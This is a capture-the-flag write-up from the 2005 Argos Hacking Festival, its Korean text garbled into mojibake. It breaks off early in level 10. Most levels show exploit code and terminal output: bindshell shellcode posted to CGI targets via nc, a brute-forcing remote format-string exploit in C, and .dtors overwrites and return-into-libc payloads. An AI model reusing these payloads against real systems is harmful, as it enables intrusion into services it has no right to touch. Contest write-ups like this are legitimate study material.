================================
/ /
/ Argos Hacking Festival 2005 /
/ (report) /
================================
[hkpco@ns hkpco]$ whoami
id / hkpco(monami)
mail&msn / hkpco@korea.com
homepage / http://hkpco.kr/
name / Park Chan Am
| menu |
---------------------------------------------------
1. level1 - Brute Force |
2. level2 - File Upload |
3. level3 - Debugging |
4. level4 - Windows Crack |
5. level5 - Using a Method |
6. level6 - $-flag Format_String_Bug |
7. level7 - Remote cgi Buffer_Over_Flow |
8. level8 - Remote cgi Format_String_Bug |
9. level9 - Fedora Buffer_Over_Flow |
10. level10 - Fedora Format_String_Bug |
11. level11 - Rule_find(Sense) |
12. PostScript |
---------------------------------------------------
!!!!!!!!!!!!!!!!!! 1. level1 - Brute Force !!!!!!!!!!!!!!!!!!
/*
# LEVEL1 #
¿øÁÖÀ² pi´Â ¹«ÇѼҼö·Î À¯¸íÇÑ ¼öÀÔ´Ï´Ù.
¿øÁÖÀ² piÀÇ ¼Ò¼öÁ¡ ¾Æ·¡ 10000¹ø°ºÎÅÍ 10002¹ø°±îÁö ¼¼ ÀÚ¸®ÀÇ ¼ö¸¦ Â÷·Ê·Î ÀÔ·ÂÇϼ¼¿ä.
*/
level1Àº °£´ÜÇÑ Brute Force ¿´½À´Ï´Ù.
¼¼ÀÚ¸® ¼ö°¡ 001,002,003 ¿Í°°Àº Çü½ÄÀÏ ¼öµµ ÀÖ´Ù´Â °ÍÀ» °¨¾ÈÇÏ¿© %03dÀ» ÀÌ¿ëÇÏ¿´½À´Ï´Ù.
- bruteforce.c -
int main( void )
{
int i;
char cmd[1024];
for( i=0 ; i<1000 ; i++ )
{
sprintf( cmd , "(printf \"GET http://168.188.130.231/level1.php?number=%03d HTTP/1.0\\n\\n\")|nc 168.188.130.231 80" , i );
system( cmd );
}
}
[hkpco@localhost ahf]$ cat > bruteforce.c
int main( void )
{
int i;
char cmd[1024];
for( i=0 ; i<1000 ; i++ )
{
sprintf( cmd , "(printf \"GET http://168.188.130.231/level1.php?number=%03d HTTP/1.0\\n\\n\")|nc 168.188.130.231 80" , i );
system( cmd );
}
}
[hkpco@localhost ahf]$ gcc -o bruteforce bruteforce.c
[hkpco@localhost ahf]$ ./bruteforce > result
[hkpco@localhost ahf]$ cat result | grep "pass"
ÃàÇÏÇÕ´Ï´Ù.
level1 password is 'pi=3.141592'
ÀÎÁõ¼¹ö¿¡ ÀÎÁõÇϼ¼¿ä
# LEVEL1 #
[hkpco@localhost ahf]$
!!!!!!!!!!!!!!!!!! level2 - File Upload !!!!!!!!!!!!!!!!!!
/*
# LEVEL2 #
ÆÄÀÏ ¿Ã¸®±â
*/
level2 ´Â File Upload ¹®Á¦ÀÔ´Ï´Ù.
php È®ÀåÀÚ´Â ¾÷·Îµå¸¦ ÇÏÁö ¸øÇÏ°Ô Çسõ¾Ò½À´Ï´Ù.
.ph ·Î ¿ìȸÇÏ¿© ¾÷·Îµå ÇÕ´Ï´Ù.( *.ph È®ÀåÀÚ¿Ü¿¡µµ phP ,pHp µîÀ¸·Î ¿ìȸÇÒ ¼ö ÀÖ½À´Ï´Ù.)
- hk.ph -
(cmd¿¡ Àü´ÞÇÒ ¸í·É) cat /usr/local/apache/htdocs/board/data/level2_vkdlfdjq/auth_vkdlfdjqfhem.txt
ÃàÇÏÇÕ´Ï´Ù.
Level2 password is "SoBored!"
ÀÎÁõ¼¹ö¿¡ ÀÎÁõÇϼ¼¿ä.
!!!!!!!!!!!!!!!!!! level3 - Debugging !!!!!!!!!!!!!!!!!!
/*
# LEVEL3 #
168.188.130.231¿¡ guest °èÁ¤(¾ÏÈ£ : AHF2005guest)À¸·Î Á¢¼Ó(SSH)ÇϽøé,
level3 ¹®Á¦°¡ ÀÖ½À´Ï´Ù^^ Àç¹Õ°ÔǪ¼¼¿ä~
*/
level3Àº debugging ¹®Á¦ÀÔ´Ï´Ù.
´Ù¸¥ userÀÇ uidÀÎ 0x1f9(505) ¿Í getuid()ÀÇ ¸®ÅÏ°ªÀÎ %eax ·¹Áö½ºÅ͸¦ ºñ±³ÇÕ´Ï´Ù.
gdb¸¦ ÅëÇÏ¿© °£´ÜÈ÷ ÀÎÁõÀ» Åë°úÇÏ¸é µË´Ï´Ù.
[guest@localhost guest]$ gdb -q level3
(gdb) disassemble main
Dump of assembler code for function main:
0x080483b2 : push %ebp
0x080483b3 : mov %esp,%ebp
0x080483b5 : sub $0x8,%esp
0x080483b8 : and $0xfffffff0,%esp
0x080483bb : mov $0x0,%eax
0x080483c0 : sub %eax,%esp
0x080483c2 : movl $0x0,0xfffffffc(%ebp)
0x080483c9 : movl $0x0,0xfffffffc(%ebp)
0x080483d0 : cmpl $0x63,0xfffffffc(%ebp)
0x080483d4 : jle 0x80483d8
0x080483d6 : jmp 0x80483e9
0x080483d8 : lea 0xfffffffc(%ebp),%eax
0x080483db : incl (%eax)
0x080483dd : lea 0xfffffffc(%ebp),%eax
0x080483e0 : incl (%eax)
0x080483e2 : lea 0xfffffffc(%ebp),%eax
0x080483e5 : incl (%eax)
0x080483e7 : jmp 0x80483d0
0x080483e9 : call 0x804829c
////////// 0x080483ee : cmp $0x1f9,%eax ////////// point!
0x080483f3 : jne 0x804840c
0x080483f5 : sub $0xc,%esp
0x080483f8 : push $0x8048516
0x080483fd : call 0x804828c
0x08048402 : add $0x10,%esp
0x08048405 : call 0x804835c
0x0804840a : jmp 0x804841c
0x0804840c : sub $0xc,%esp
0x0804840f : push $0x8048520
0x08048414 : call 0x804828c
0x08048419 : add $0x10,%esp
0x0804841c : mov $0x0,%eax
0x08048421 : leave
0x08048422 : ret
0x08048423 : nop
End of assembler dump.
(gdb) b *0x080483e9
Breakpoint 1 at 0x80483e9
(gdb) b *0x080483ee
Breakpoint 2 at 0x80483ee
(gdb) r
Starting program: /home/guest/level3
Breakpoint 1, 0x080483e9 in main ()
(gdb) info reg eax
eax 0xbffffb04 -1073743100
(gdb) c
Continuing.
Breakpoint 2, 0x080483ee in main ()
(gdb) info reg eax
eax 0x1f6 502
(gdb) set $eax=505
(gdb) info reg eax
eax 0x1f9 505
(gdb) c
Continuing.
Great!!
level3 password : 999379
´õ¿í °£´ÜÈ÷ Ǫ´Â ¹æ¹ýÀº ptrace¸¦ ÀÌ¿ëÇÏ´Â °ÍÀÔ´Ï´Ù.
indra´ÔÀÇ Äڵ带 ¼öÁ¤ÇÏ¿´½À´Ï´Ù.
http://hkpco.joinc.co.kr/ahf/ptrace.c
[guest@localhost guest]$ gcc -o ptrace ptrace.c -DAHF
[guest@localhost guest]$ ./ptrace
UserName: level3
Great!!
level3 password : 999379
!!!!!!!!!!!!!!!!!! level4 - Windows Crack !!!!!!!!!!!!!!!!!!
/*
# LEVEL4 #
´ÙÀ½ ÇÁ·Î±×·¥¿¡ ÀÖ´Â ½Ã¸®¾ó(Serial) ¹øÈ£¸¦ ãÀ¸¼¼¿ä!! ^^
ÇÁ·Î±×·¥ ´Ù¿î¹Þ±â : level4.exe
*/
Crack ¹®Á¦ÀÔ´Ï´Ù.
ollydbg¸¦ ÅëÇÏ¿© Ç® ¼ö ÀÖ½À´Ï´Ù.
±×¸²À¸·Î ³ªÅ¸³¾ ¼ö ¾øÀ¸´Ï °£´ÜÈ÷ ¼ø¼·Î ¾Ë¾Æº¸°Ú½À´Ï´Ù.
1. level4.exe Open
2. Search for -> All referenced text strings -> ASCII "Debugger is detected! program terminated!" (double click)
3. µð¹ö±ë Çϴ°ÍÀ» º¸È£ÇÏ°í Àֱ⠶§¹®¿¡ ±×ºÎºÐÀ» ¿ìȸÇÏ¿©¾ß ÇÕ´Ï´Ù.
JE SHORT level4.0040190F ºÎºÐÀ» JMP level4.0040190F ·Î ¹Ù²ãÁÝ´Ï´Ù.
4. Debug -> Run
5. ½ÇÇàµÈ ÇÁ·Î±×·¥¿¡ ÀÓÀÇÀÇ °ªÀ» ÀÔ·ÂÇÑ µÚ È®ÀÎ.
6. Áß°£ ÁîÀ½¿¡ ´Ù¸¥ âÀ» º¸½Ã¸é sTACK ss:[0012f748]=0116740E , EAX=¾Æ¹«°ª ¿¡¼
¹Ù·Î sTACK ss:[0012f748]=0116740E ÀÌ ºÎºÐ¿¡ serialÀÌ µé¾î ÀÖ½À´Ï´Ù.
0116740E¸¦ ½ÊÁø¼ö·Î °íÄ£µÚ »õ ÇÁ·Î±×·¥À» ¶ç¿îÈÄ ÀÔ·Â.
7. 18248718ÀÔ·Â ->
Great!!
Level 4 password is my password
!!!!!!!!!!!!!!!!!! Level5 - Using a Method !!!!!!!!!!!!!!!!!!
/*
# LEVEL5 #
Hint 1 : HTTP Body¸¦ ÇÊ¿ä·ÎÇÏÁö ¾Ê½À´Ï´Ù.
Hint 2 : ¾Æ·¡´Â Çö ´ëȸ¼¹öÀÇ httpd.conf ÀÔ´Ï´Ù.
*/
À̹ø ¹®Á¦´Â httpd.conf¸¦ ÂüÁ¶ÇÏ¿© ÄíÅ°°ª°ú Method¸¦ ÀÌ¿ëÇÏ¿© Ǫ´Â ¹®Á¦ÀÔ´Ï´Ù.
httpd.conf¿¡¼ ¿ì¸®°¡ ÇÊ¿ä·Î ÇÏ´Â ºÎºÐÀ» º¸°Ú½À´Ï´Ù.
-----------------------------------------------------
SetEnvIf Cookies "we are one" AHF2005
Order deny,allow
deny from all
allow from env=AHF2005
-----------------------------------------------------
Cookies¶ó´Â ȯ°æº¯¼ö¿¡ we are one À̶ó´Â º¯¼ö°¡ ÀÖÀ¸¸é AHF2005¸¦ È°¼ºÈ ½ÃÄѼ ÀÎÁõ ÇÒ ¼ö ÀÖ½À´Ï´Ù.
ÈùÆ®¿¡¼ HTTP Body¸¦ ÇÊ¿ä·Î ÇÏÁö ¾Ê´Â´Ù°í ÇÑ °Í¿¡ À¯ÀÇÇØ¾ß ÇÕ´Ï´Ù.
Body°¡ ¾Æ´Ï¸é HeadÀÏ °¡´É¼ºÀÌ ¸¹½À´Ï´Ù.
ÀÏ´Ü »ç¿ë °¡´ÉÇÑ ¸Þ¼Òµå¸¦ º¸°Ú½À´Ï´Ù.
¿¹Àü¿¡ °£´ÜÈ÷ OPTIONS_method¸¦ ¿äûÇÑ µÚ, °á°ú¸¦ Ãâ·ÂÇϵµ·Ï ¸¸µé¾îµÎ¾ú´ø ÇÁ·Î±×·¥À» ½á º¸°Ú½À´Ï´Ù.
(http://hkpco.joinc.co.kr/socket/options_method.c)
[hkpco@ns socket]$ ./options_method ahf.argos.or.kr
------------------------
| OPTIONS * HTTP/1.0 |
------------------------
request send result :
HTTP/1.1 200 OK
Date: Fri, 22 Jul 2005 11:35:19 GMT
Server: Apache
Allow: GET,HEAD,POST,OPTIONS,TRACE
Content-Length: 0
Connection: close
Content-Type: text/plain
»ç¿ë °¡´ÉÇÑ Method´Â Allow: GET,HEAD,POST,OPTIONS,TRACE ÀÔ´Ï´Ù.
±×Áß¿¡ HTTP Head¸¦ º¸´Â methodÀÎ HEAD·Î ¿äûÀ» Çغ¸¸é Æнº¿öµå°¡ Ãâ·ÂµË´Ï´Ù.
[hkpco@ns hkpco]$ telnet ahf.argos.or.kr 80
Trying 168.188.130.239...
Connected to ahf.argos.or.kr.
Escape character is '^]'.
HEAD /~level5/secret_5/ HTTP/1.0
Cookies: AHF2005=we are one
HTTP/1.1 200 OK
Date: Sun, 24 Jul 2005 04:34:11 GMT
Server: Apache
X-Powered-By: PHP/4.4.0
Password : cool guy passket!
Connection: close
Content-Type: text/html
Connection closed by foreign host.
!!!!!!!!!!!!!!!!!! level6 - $-flag Format_String_Bug !!!!!!!!!!!!!!!!!!
/*
# LEVEL6 #
168.188.130.231¿¡ guest °èÁ¤(¾ÏÈ£ : AHF2005guest)À¸·Î Á¢¼Ó(SSH)ÇϽøé level6 À̶ó´Â ÆÄÀÏÀÌ ÀÖ½À´Ï´Ù.
Àá½Ã ¿ôÀ¸¼Ì³ª¿ä? ±×·³ ´Ù½Ã AHFÀÇ ¼¼°è·Î..
*/
À̹ø ¹®Á¦´Â $-flag fsb ÀÔ´Ï´Ù.
level3¹®Á¦¸¦ Ç®·Á°í Á¢¼ÓÇÏ¿´´Ù°¡ ¾ó¶³°á¿¡ level3 ÀÎÁÙ ¾Ë°í level6À» Ç®°í ¸»¾Ò½À´Ï´Ù;; ¿¡±Ã;;
level6 ÆÄÀÏÀÇ r±ÇÇÑÀÌ ¾ø¾î¼ º¼ ¼ö ¾ø½À´Ï´Ù.
ÇÏÁö¸¸ x±ÇÇÑÀÌ ÁÖ¾îÁø °ÍÀ» ÀÌ¿ëÇÏ¿© ÆÄÀÏÀ» copyÇÑ µÚ ³»¿ëÀ» º¸¾Ò½À´Ï´Ù.
[guest@localhost guest]$ cp level6 a
[guest@localhost guest]$ ls
a level3 level6 public_html
[guest@localhost guest]$ cat a
·¹º§6 ¹®Á¦¸¦ Ç®·Á°í ¿À¼Ì¾î¿ä? :)
¼ö°í½º·´°ÚÁö¸¸ /home/level6/level6 ÀÌ°÷¿¡ ¹®Á¦°¡ ÀÖ½À´Ï´Ù.
¼ø°£À̵¿ ºÎŹµå¸³´Ï´Ù!! - binish of AHF2005 -
[level6@localhost level6]$ ls
level6 password
¹®Á¦¸¦ Ç®¾î º¸°Ú½À´Ï´Ù.
[guest@localhost level6]$ objdump -h level6 | grep ".dtors"
18 .dtors 00000008 080494f4 080494f4 000004f4 2**2
[guest@localhost guest]$ ./egg
Using address: 0xbfffdef0
------------------
egg: 0xbfffdef0 |
.dtors: 080494f8 |
------------------
+¸¦ Çϳª¾¿ Áõ°¡½ÃÅ°¸ç paddingÇÑ °á°ú 7°³Â° padding¿¡¼ bufferÀ» Ãâ·Â ÇÒ ¼ö ÀÖ¾ú½À´Ï´Ù.
ÇÏÁö¸¸ ½ÇÁ¦ °ø°Ý¿¡¼± Çѹø¿¡ ¼º°øÇÏÁö ¾ÊÀ» °ÍÀÔ´Ï´Ù.
padding¹®ÀÚ¸¦ °ø°ÝÀÌ ¼º°ø ÇÒ ¶§ ±îÁö °¨¼Ò ȤÀº, Áõ°¡ ½ÃÅ°¸ç ½ÃµµÇÕ´Ï´Ù.
[guest@localhost guest]$ /home/level6/level6 AAAA+++++++%96\$8x
AAAA+++++++41414141
* padding¹®ÀÚ¸¦ Çϳª °¨¼ÒÇÒ¶© µÚ¿¡ °è»êÇÑ %96\$57049c ºÎºÐÀ» 1¾¿ Áõ°¡½ÃÄÑ Áà¾ß ÇÕ´Ï´Ù.
/home/level6/level6 `perl -e 'print "\x41\x41\x41\x41\xf8\x94\x04\x08\x41\x41\x41\x41\xfa\x94\x04\x08"'`+++++++%96\$57049c%97\$n%98\$57615c%99\$n
½ÇÆÐ
/home/level6/level6 `perl -e 'print "\x41\x41\x41\x41\xf8\x94\x04\x08\x41\x41\x41\x41\xfa\x94\x04\x08"'`++++++%96\$57050c%97\$n%98\$57615c%99\$n
½ÇÆÐ
/home/level6/level6 `perl -e 'print "\x41\x41\x41\x41\xf8\x94\x04\x08\x41\x41\x41\x41\xfa\x94\x04\x08"'`+++++%96\$57051c%97\$n%98\$57615c%99\$n
¼º°ø
sh-2.05b$ /bin/bash
No value for $TERM and no -T specified
No value for $TERM and no -T specified
[level6@localhost guest]$ id
uid=504(level6) gid=504(guest) groups=502(guest)
[level6@localhost guest]$ cat password
cat: password: Çã°¡ °ÅºÎµÊ
ÇöÀç »óÅ¿¡¼± passwordÆÄÀÏÀÌ º¸¿©ÁöÁö ¾Ê½À´Ï´Ù.
newgrp ¸í·É¾î¸¦ ÅëÇØ °£´ÜÈ÷ level6ÀÇ gid¸¦ ¾ò¾ú½À´Ï´Ù.
[level6@localhost level6]$ newgrp
No value for $TERM and no -T specified
No value for $TERM and no -T specified
[level6@localhost level6]$ id
uid=504(level6) gid=504(level6) groups=502(guest)
[level6@localhost level6]$ cat password
ÃàÇÏÇÕ´Ï´Ù.
level6 password is "MayTheForceBeWithYou!!"
ÀÎÁõ¼¹ö¿¡ ÀÎÁõÇϼ¼¿ä
!!!!!!!!!!!!!!!!!! level7 - Remote cgi Buffer_Over_Flow !!!!!!!!!!!!!!!!!!
/*
# LEVEL7 #
LOGIN ::
ID
PASS
*/
À̹ø ¹®Á¦´Â remote cgi bofÀÔ´Ï´Ù.
id¿Í pass¸¦ ÀÔ·ÂÇÏ¸é ·Î±×Àο¡ ½ÇÆÐÇÏ¿´´Ù´Â ¹®±¸¿Í ÇÔ²² dump°á°ú¸¦ Ãâ·ÂÇØ ÁÝ´Ï´Ù.
°ø°Ý ÄÚµå´Â
[NOP]
[bindshell]
[bindshell_addr]
ÀÌ·¸°Ô ±¸¼ºµÇ¾îÁ® ÀÖ½À´Ï´Ù. bindshellÀº 30464port¸¦ ¿¾îÁÝ´Ï´Ù.
°ø°ÝÇØ º¸°Ú½À´Ï´Ù.
(terminal1)
[hkpco@localhost bof]$ (perl -e 'print "POST /cgi-bin/level7.cgi HTTP/1.0\nHost: 168.188.130.231\nUser-Agent: HTTPTool/1.0\nContent-Length: 500\n\n","\x90"x16,"\x31\xc0\xb0\x02\xcd\x80\x85\xc0\x75\x43\xeb\x43\x5e\x31\xc0\x31\xdb\x89\xf1\xb0\x02\x89\x06\xb0\x01\x89\x46\x04\xb0\x06\x89\x46\x08\xb0\x66\xb3\x01\xcd\x80\x89\x06\xb0\x02\x66\x89\x46\x0c\xb0\x77\x66\x89\x46\x0e\x8d\x46\x0c\x89\x46\x04\x31\xc0\x89\x46\x10\xb0\x10\x89\x46\x08\xb0\x66\xb3\x02\xcd\x80\xeb\x04\xeb\x55\xeb\x5b\xb0\x01\x89\x46\x04\xb0\x66\xb3\x04\xcd\x80\x31\xc0\x89\x46\x04\x89\x46\x08\xb0\x66\xb3\x05\xcd\x80\x88\xc3\xb0\x3f\x31\xc9\xcd\x80\xb0\x3f\xb1\x01\xcd\x80\xb0\x3f\xb1\x02\xcd\x80\xb8\x2f\x62\x69\x6e\x89\x06\xb8\x2f\x73\x68\x2f\x89\x46\x04\x31\xc0\x88\x46\x07\x89\x76\x08\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xc0\xb0\x01\x31\xdb\xcd\x80\xe8\x5b\xff\xff\xff","\x90"x3,"\xd1\xfa\xff\xbf"x100';cat)|nc 168.188.130.231 80
(terminal2)
[hkpco@ns hkpco]$ telnet 168.188.130.231 30464
Trying 168.188.130.231...
Connected to 168.188.130.231.
Escape character is '^]'.
ls;
dumpcode.h
level7.cgi
level7_qjvjdhqjvmffh
: command not found
cd level7_qjvjdhqjvmffh;
: command not found
ls;
auth_dhqjvmffh.txt
: command not found
cat auth_dhqjvmffh.txt;
ÃàÇÏÇÕ´Ï´Ù.
level 7 passwd is "ThereIsNoFork!";
ÀÎÁõ¼¹ö¿¡¼ ÀÎÁõÇϼ¼¿ä
: command not found
!!!!!!!!!!!!!!!!!! level8 - Remote cgi Format_String_Bug !!!!!!!!!!!!!!!!!!
/*
LOGIN
ID
PASS
*/
ÀÌ°Í ¿ª½Ã³ª remote_attack ÀÔ´Ï´Ù.
Remote cgi Format_String_Bug in Heap Memory ¶ó°í Çصµ ±¦Âú°Ú±º¿ä~
passket´ÔÀÇ `FSB in Heap Memory`¸¦ Àо½Å ºÐÀ̶ó¸é ¹«³È÷ Ç® ¼ö ÀÖ°Ú½À´Ï´Ù.
¹Ý³âÀüÂë¿¡ Àоú´ø passket´ÔÀÇ ¹®¼°¡ µµ¿òÀÌ ¸¹ÀÌ µÇ¾ú´ø°Í °°½À´Ï´Ù.
(Àü Àо Çì¸Þ´Â;;)
passket´ÔÀÇ ¹®¼¿¡¼µµ ¾ð±ÞµÇ¾úÁö¸¸, printfÀÇ ½ºÅÃÆ÷ÀÎÅÍ´Â 0xbf++++++ -> 0xc0++++++ À¸·Î °¡¹Ç·Î
Heap¿µ¿ª¿¡¼ FSB°¡ ¹ß»ýÇÏ¸é ¹«¿ëÁö¹°ÀÔ´Ï´Ù.
ÇÏÁö¸¸, ÇÁ·Î±×·¥ ³»¿¡ stackÀ» »ç¿ëÇÒ ¼ö ÀÖ´Ù¸é À̾߱â´Â ´Þ¶óÁý´Ï´Ù.
°ø°ÝÄÚµåÀÇ ±¸Á¶¸¦ º¸°Ú½À´Ï´Ù.
(i¿Íj´Â brute_forceÇÏ´Â °ª)
AAAA[brute1][\x04\x08]CCCC[brute2][\x04\x08] <- j+2 , i //16byte
[dummy] //240byte
----------¡èbuf1 , ¡ébuf2----------
[%08x]x7 //56byte
[%1996c%hn%39068c%hn] <- j , i //2byte
[NOP]x100 //100byte
[bind_code] //177byte
.dtors¿µ¿ªÀ» brute_force ÇÏ¿© µ¤¾î¾²µµ·Ï ÄÚµùÇÏ¿´½À´Ï´Ù.
ÇÁ·Î±×·¥À» ¶ç¿îµÚ Àá½Ã ÈÄ bindshellÀÌ ¶ç¿öÁØ port(30464)·Î Á¢¼ÓÇÏ¸é µË´Ï´Ù.
- remote_attack.c -
#include
int main( void )
{
int i, j;
char cmd[2048];
for(i=0x99;i<0xa0;i++)
for(j=0x01;j<0xff;j++)
{
sprintf( cmd , "printf \"\\n\"|(perl -e 'print \"POST /cgi-bin/level8.cgi HTTP/1.0\\n\",\"Host: 168.188.130.232\\n\",\"Content-Length: 613\\n\\n\",\"AAAA\\x%02x\\x%02x\\x04\\x08CCCC\\x%02x\\x%02x\\x04\\x08\", \"A\"x240,\"%%08x\"x7, \"%%1996c%%hn%%39068c%%hn\" , \"\\x90\"x100,\"\\x31\\xc0\\xb0\\x02\\xcd\\x80\\x85\\xc0\\x75\\x43\\xeb\\x43\\x5e\\x31\\xc0\\x31\\xdb\\x89\\xf1\\xb0\\x02\\x89\\x06\\xb0\\x01\\x89\\x46\\x04\\xb0\\x06\\x89\\x46\\x08\\xb0\\x66\\xb3\\x01\\xcd\\x80\\x89\\x06\\xb0\\x02\\x66\\x89\\x46\\x0c\\xb0\\x77\\x66\\x89\\x46\\x0e\\x8d\\x46\\x0c\\x89\\x46\\x04\\x31\\xc0\\x89\\x46\\x10\\xb0\\x10\\x89\\x46\\x08\\xb0\\x66\\xb3\\x02\\xcd\\x80\\xeb\\x04\\xeb\\x55\\xeb\\x5b\\xb0\\x01\\x89\\x46\\x04\\xb0\\x66\\xb3\\x04\\xcd\\x80\\x31\\xc0\\x89\\x46\\x04\\x89\\x46\\x08\\xb0\\x66\\xb3\\x05\\xcd\\x80\\x88\\xc3\\xb0\\x3f\\x31\\xc9\\xcd\\x80\\xb0\\x3f\\xb1\\x01\\xcd\\x80\\xb0\\x3f\\xb1\\x02\\xcd\\x80\\xb8\\x2f\\x62\\x69\\x6e\\x89\\x06\\xb8\\x2f\\x73\\x68\\x2f\\x89\\x46\\x04\\x31\\xc0\\x88\\x46\\x07\\x89\\x76\\x08\\x89\\x46\\x0c\\xb0\\x0b\\x89\\xf3\\x8d\\x4e\\x08\\x8d\\x56\\x0c\\xcd\\x80\\x31\\xc0\\xb0\\x01\\x31\\xdb\\xcd\\x80\\xe8\\x5b\\xff\\xff\\xff\"';cat) | nc 168.188.130.232 80" , j+2 , i , j , i );
system( cmd );
}
return 0;
}
(terminal1)
[hkpco@localhost fsb]$ gcc -o remote_attack remote_attack.c
[hkpco@localhost fsb]$ ./remote_attack >/dev/null
(terminal2)
[hkpco@ns hkpco]$ telnet 168.188.130.232 30464
Trying 168.188.130.232...
Connected to 168.188.130.232.
Escape character is '^]'.
ls;
dumpcode.h
level8.cgi
level8_glqdudduvhapt
: command not found
cd level8_glqdudduvhapt;
: command not found
ls;
auth_eggmelong.txt
: command not found
cat auth_eggmelong.txt;
ÃàÇÏÇÕ´Ï´Ù.
level8 password is "AnotherWayToMyWay~"
ÀÎÁõ¼¹ö¿¡¼ ÀÎÁõÇϼ¼¿ä
!!!!!!!!!!!!!!!!!! level9 - Fedora Buffer_Over_Flow !!!!!!!!!!!!!!!!!!
/*
# LEVEL9 #
168.188.130.233¿¡ guest °èÁ¤(¾ÏÈ£ : guest_ahf2005)À¸·Î ·Î±×ÀÎ(SSH)ÇϽøé,
level9 ¹®Á¦ÆÄÀÏÀÌ ÀÖ½À´Ï´Ù.°ÇÅõ¸¦ º÷´Ï´Ù!
*/
level9¹®Á¦´Â ±âº»ÀûÀÎ Fedora BOF ¹®Á¦ÀÔ´Ï´Ù.
Fedora BOF¿¡ ´ëÇÑ ÀÚ¼¼ÇÑ ¼³¸íÀº ÇÏÁö ¾Ê°Ú½À´Ï´Ù.
±×·³ ¹®Á¦¸¦ °ø·« ÇØ º¸°Ú½À´Ï´Ù.
[guest@localhost guest]$ cat /etc/*release
Fedora Core release 2 (Tettnang)
Fedora Core release 2 (Tettnang)
// Fedora È®ÀÎ
[guest@localhost .hk]$ gdb -q /home/guest/level9
(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) b main
Breakpoint 1 at 0x80485e0
(gdb) r
Starting program: /home/guest/level9
Error while mapping shared library sections:
: Success.
Error while reading shared library symbols:
: No such file or directory.
(no debugging symbols found)...(no debugging symbols found)...Error while reading shared library symbols:
: No such file or directory.
Error while reading shared library symbols:
: No such file or directory.
Breakpoint 1, 0x080485e0 in main ()
(gdb) disassemble execl
Dump of assembler code for function execl:
0x00197a00 : push %ebp
0x00197a01 : mov %esp,%ebp
[ 0x00197a03 : lea 0x10(%ebp),%eax ] // the point!
.
.
.
---Type to continue, or q to quit---q
Quit
[guest@localhost .hk]$ gdb -q /home/guest/level9
(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) b main
Breakpoint 1 at 0x80485e0
(gdb) r
Starting program: /home/guest/level9
Error while mapping shared library sections:
: Success.
Error while reading shared library symbols:
: No such file or directory.
(no debugging symbols found)...(no debugging symbols found)...Error while reading shared library symbols:
: No such file or directory.
Error while reading shared library symbols:
: No such file or directory.
Breakpoint 1, 0x080485e0 in main ()
(gdb) x/50x 0x8049000
0x8049000: 0x464c457f 0x00010101 0x00000000 0x00000000
0x8049010: 0x00030002 0x00000001 0x080482c0 0x00000034
0x8049020: 0x00000788 0x00000000 0x00200034 0x00280007
0x8049030: 0x0019001c 0x00000006 0x00000034 0x08048034
0x8049040: 0x08048034 0x000000e0 0x000000e0 0x00000005
0x8049050: 0x00000004 0x00000003 0x00000114 0x08048114
0x8049060: 0x08048114 0x00000013 0x00000013 0x00000004
0x8049070: 0x00000001 0x00000001 0x00000000 0x08048000
0x8049080: 0x08048000 0x0000047c 0x0000047c 0x00000005
0x8049090: 0x00001000 0x00000001 0x0000047c 0x0804947c
0x80490a0: 0x0804947c 0x00000100 0x00000104 0x00000006
0x80490b0: 0x00001000 0x00000002 0x00000490 0x08049490
0x80490c0: 0x08049490 0x000000c8
(gdb)
.
.
.
0x8049560 <_GLOBAL_OFFSET_TABLE_+4>: 0x0095f4d0 0x00954830 0x009769f0 0x080482b6
(gdb) x/8x 0x8049564
0x8049564 <_GLOBAL_OFFSET_TABLE_+8>: 0x00954830 [ 0x009769f0 0x080482b6 0x00000000 ] // the point!
0x8049574 <__dso_handle>: 0x00000000 0x08049488 0x00000000 0x00000000
(gdb) x/8x 0x009769f0
0x9769f0 <__libc_start_main>: [0x57e58955 0xec835356 0x0c458b4c 0xe810558b] // the point!
0x976a00 <__libc_start_main+16>: [0xffffff09 0x25f8c381] 0x7d8b00[10] 0x1c758b18 // the point!
[guest@localhost .hk]$ cat > sh.c
int main( void )
{
setreuid(geteuid(),geteuid());
setregid(getegid(),getegid());
execl("/bin/sh", "sh", 0);
}
[guest@localhost .hk]$ gcc -o sh sh.c
[guest@localhost .hk]$ ln -s ./sh "`perl -e 'print "\x55\x89\xe5\x57\x56\x53\x83\xec\x4c\x8b\x45\x0c\x8b\x55\x10\xe8\x09\xff\xff\xff\x81\xc3\xf8\x25\x10"'`"
perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
LANGUAGE = (unset),
LC_ALL = (unset),
LANG = "euc_KR"
are supported and installed on your system.
perl: warning: Falling back to the standard locale ("C").
[guest@localhost .hk]$ ls
U??WVS??L?E??U?????????%? sh sh.c
[guest@localhost .hk]$ gdb -q /home/guest/level9_vul
(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) disassemble main
Dump of assembler code for function main:
0x08048370 : push %ebp
0x08048371 : mov %esp,%ebp
0x08048373 : sub $0x108,%esp <- 0x108==264
.
.
.
(gdb) quit
¸¶Áö¸·À¸·Î °ø°ÝÇÒ ÅºµÎ´Â ¾Æ·¡¿Í °°½À´Ï´Ù.
| dummy(264byte) | execl ù argument -8 | (execl+3)_addr |
ÀÚ, ÀÌÁ¦ ÃÖÁ¾ÀûÀ¸·Î °ø°Ý ÇØ º¸°Ú½À´Ï´Ù.
[guest@localhost .hk]$ /home/guest/level9_vul "`perl -e 'print "A"x264,"\x60\x95\x04\x08","\x03\x7a\x19"'`"
perl: warning: Setting locale failed.
perl: warning: Please check that your locale settings:
LANGUAGE = (unset),
LC_ALL = (unset),
LANG = "euc_KR"
are supported and installed on your system.
perl: warning: Falling back to the standard locale ("C").
sh-2.05b$ id
uid=504(guest) gid=501(level9) groups=504(guest)
sh-2.05b$ cat /home/guest/level9_password
ÃàÇÏÇÕ´Ï´Ù.
Level9 password id "FeDoRaCoRe2 was broken!"
ÀÎÁõ¼¹ö¿¡ ÀÎÁõÇϼ¼¿ä
!!!!!!!!!!!!!!!!!! level10 - Fedora Format_String_Bug !!!!!!!!!!!!!!!!!!
/*
# LEVEL10 #
168.188.130.233¿¡ guest2 °èÁ¤(¾ÏÈ£ : guest2_ahf2005)À¸·Î ·Î±×ÀÎ(SSH)ÇϽøé,
